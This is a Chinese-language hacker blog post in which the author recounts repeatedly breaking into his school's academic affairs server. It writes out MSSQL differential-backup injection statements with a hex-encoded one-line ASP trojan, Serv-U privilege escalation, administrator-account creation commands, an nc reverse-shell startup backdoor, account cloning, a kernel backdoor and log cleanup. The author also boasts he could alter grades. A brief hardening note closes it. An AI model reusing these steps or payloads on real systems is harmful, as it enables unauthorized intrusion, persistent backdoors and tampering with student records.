N次杀入学校教务处(图)

已经不记得是第几次进入学校教务处啦，反正每次都有不同的理由。好笑的是每次管理员只是发现入侵者，简单的做了下防护，而没有注意到其它安全的问题。所以就有了我X次入侵的过程。最重要的是觉得如果是黑客/安全技术爱好者的话，学校的网站是一定要拿下的，我已经拿下了学校的主网站和教务处网站，而这两个网站都是我们学校网站重中之重的网站，而且学校教务处网站有我们全校学生的成绩数据库，平时我们查成绩的时候就要用到这个网站。

在我的印象中比较深刻的有三次进入到教务处网站。第一次是刚到学校读书的时候，老师老是叫我们到教务处找考试的消息。我就注意到教务处网站的重要性啦。当时还是sql注入和上传最流行的时候。当然我们学校网站也不例外啊。教务处网站用的是windows 2000 server系统。浏览下教务处网站觉得做的还不错的啊，扫了下开放的端口和检查下sql注入，竟然没有找到任何的漏洞(当时还是静态网站)。我不相信没有漏洞，也怀疑是不是学校有高人存在的原因。拿出啊D的注入工具找上传的网页，当出现有的时候，我心里一阵狂喜。打开后才知道dvbbs6.0论坛上传网页。原来管理员把上传页面改了。呵呵，对不起啦，找到压箱宝底桂林老兵的上传利用程序上传asp木马，拿到了webshell。扫了下21端口，网站用的还是serv-u4.0版本，最后上传su.exe溢出拿到了网站的绝对权限。网站还开了3389也省了我开终端端口，克隆了guest帐号，读出管理员的密码，清理脚印走人。当时也是得意的很啊。我想管理员不会轻易发现我的存在了吧。过了很长一段时间，用克隆的帐号进入主机的时候，发现我再也进不去啦。管理员的密码也进不去，当时也很生气学校要我们交这个方面的钱，那个方面的钱。不得不让我再次下定决心入侵教务处，也就有了我的第二次。这次学校网站也改为动态的网站啦，用的是asp的程序。我想管理员发现了入侵者不一定在web程序上下功夫。打开留下的asp木马果然还在。当我再次拿出su.exe程序溢出时发现怎么也登陆不上主机。扫了下端口。晕的是管理员竟然把serv-u卸载啦。su溢出取得权限已经行不通啦。在主机上找有没有什么可以利用的漏洞。可恶的是管理员没有留下可以直接取得权限的东西。留下的asp木马可以浏览任意盘，看来也只有走这条路啦。思路是写个死循环，放个vbs到启动项目去。当主机启动时也就启动了我留下的后门。我的vbs放在c:\Documents and Settings\Administrator\「开始」菜单\程序\启动\shell.vbs下。利用瑞士军刀nc反向连接返回一个cmdshell,运行死循环的批处理。此时的cmdshell是guest权限，而guest权限下的确是有能力让主机重起的。(guest权限下重起代码已经打包给大家了)这个时候就只有等待咯。当黑客也是要有耐心的。呵呵，果然过了几天的时间网站打不开了，我想管理员应该去重新启动下主机了吧，后来也理所当然的再次拿到了主机的绝对权限。也再次克隆了guest帐号和管理员的密码。

快要毕业了，学生一切的行动都要按照教务处的去做。呵呵我有网站的绝对权限我怕什么(后来学校把成绩这一块也放到了教务处)。我想怎么改成绩就怎么改。某一天，当我再次得意的用guest帐号和管理员密码进入主机的时候，它对我说"NO"。哦，当时我快疯掉啦，快要毕业了这么紧要的关头我再次与教务处网站说"BYEBYE"。我在想不知道是那个名人说过"如果连自己学校的网站都搞不定，他不适合当黑客"。这句话对我的印象很深刻。也就有了我最进的第三次比较深刻的入侵，也就是本文要讲的核心内容。(前二次是"过去式"，没有给大家抓图，对不起各位看官啦：))后来教务处有了很大的变化，我的asp木马终于被管理员发现了。webshell也就没有啦。dvbbs论坛也被删掉了。看来走上传拿到webshell行不通。网站不是用的asp的程序吗，看有没有sql注入漏洞。经过检查典型的sql注入漏洞。拿出大名鼎鼎的nbsi扫下，原来是DB_OWNER的权限(图一)。

哦，现在教务处用的是asp+mssql黄金组合。利用sqlhello.exe远程溢出程序，怎么也返回不了主机的cmdshell，看来溢出这条路也行不通啦。好的，整理下思路，首先是利用备份差异拿到webshell。当然要知道网站的数据库是不是放在同一个网站上呐，用nbsi的列目录功能，幸运的是数据库和web是同一个主机上的。(图二)

好的，紧张的时刻到了，差异备份得到webshell。第一步： @a sysname,@s varchar(4000) select @a=db_name(),@s=0x6A776368627565 backup database @a to disk=@s--备份当前数据库,以差异备份.(其中0x6A776368627565是我的当前数据库jwchbue)第二步： table [huanle];create table [dbo].[huanle] ([cmd] [image])-- 建表加字段。第三步： into huanle(cmd) values(0x3C2565786563757465207265717565737428224E6565616F2229253E)-- 写入蓝屏大叔一句话木马。第四步 @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C6A77635C7368656C6C2E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--。(0x643A5C6A77635C7368656C6C2E617370是备份得到webshell路径d:\jwc\shell.asp)。再次以差异备份得到插入有蓝屏大叔一句话木马的WEBSHELL 。备份得到webshell路径是第五步： table [huanle]-- 删除建立的表。小心使得万年船：)。打开备份得到的网页。出现了错误。(图三)

说明你已经成功啦。利用蓝屏客户端连接，添上你的asp木马。(图四)

提交后出现了令人激动的asp木马。(图五)。

小样看你能飞出我的五指山!!呵呵!!!扫描下是否开放了ftp端口。幸运的是管理员仍然用的是serv-u4.0版本的。(图六)

看来取得权限只是时间上的问题啦。利用刚刚得到的asp木马上传一个超级大马桂林老兵的asp站长助手。(图七)

仍然可以浏览任意盘，并且可以利用cmd.exe .上传serv-u的本地溢出程序，net user test test /add,net localgroup administrators test /add(图八)。

就这样第X次拿到学校教务处的绝对权限。因为开了3389所以不费力气去开终端，(图九)

这次不会让“肉鸡”跑了。不仅克隆了guest帐号和再次读出了管理员的密码还放了内核级的后门程序，最后当然是清理脚印。我想管理员没有想到这么快会有入侵者再次“光临”吧。

sql注入、上传型漏洞、serv-u提升权限已经流行了很长一段时间啦，说明教务处网站管理员不是很注意网络的安全。从小小的一个sql注入漏洞竟然可以拿到系统的administrator权限是多么恐怖的一件事情。可以看出安全是一个整体。毕竟是自己学校的网站也不好意思去破坏。(本人可是个好人哦)还是帮学校做下安全吧。系统已经打上了sp4和最新的补丁，管理员只是注重系统的安全，也可以说管理员很懒惰。问题的原因还是web程序上出现了漏洞，补上sql防注入的程序，serv-u下个最新的版本，并严格控制权限。mssql也打上了最新的补丁，并且严格控制任意盘的权限，重中之重是控制好c:\program file\serv-u、启动项目、等一些重要的目录的权限。web程序也给出专门的管理人员权限，我想基本上算是安全了吧。本文没有什么技术含量，用到的都是一些常用的入侵方法。比如guest权限下重起主机，这也是提升权限的一个方法。只是想告诉大家入侵并不是一成不变的，如果在入侵中多动下脑收获会更多。文章写作匆忙，难免会有纰漏，还望指正。